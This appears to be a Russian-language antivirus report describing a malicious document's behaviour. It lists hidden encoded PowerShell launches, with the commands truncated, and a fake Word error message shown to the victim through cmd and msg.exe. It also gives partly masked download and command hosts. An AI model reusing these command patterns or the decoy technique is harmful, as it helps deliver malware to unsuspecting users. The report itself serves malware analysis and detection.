Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IAAgAFMARQBUAC0AVgBhAHIAaQBhAGIATABlACAAKAAnAFMAJwArACcAMQA1ACcAKwAnADYAUQA4ACcAKQAgACAAKAAgACAAWwB0AHkAcABlAF0AKAAiAHsAMAB9AHsAMQB9AHsAMwB9AHsAMgB9ACIALQBGACcA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1164048.cvr
Сетевая активность
Подключается к
- 'no###lya.com':443
- 'wh###ch.info':443
- 're##co.net':80
- 're##co.net':443
- 'pa#####nnathtemple.com':80
- 'ac####iblehr.com':443
- 'sn###llers.com':443
TCP
Запросы HTTP GET
- http://re##co.net/wp-content/uploads/2020/12/S0K/
Другие
- 'no###lya.com':443
- 'wh###ch.info':443
- 're##co.net':443
- 'ac####iblehr.com':443
- 'sn###llers.com':443
UDP
- DNS ASK no###lya.com
- DNS ASK wh###ch.info
- DNS ASK re##co.net
- DNS ASK pa#####nnathtemple.com
- DNS ASK ac####iblehr.com
- DNS ASK he######harmaceutical.com
- DNS ASK sn###llers.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgAFMARQBUAC0AVgBhAHIAaQBhAGIATABlACAAKAAnAFMAJwArACcAMQA1AC...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
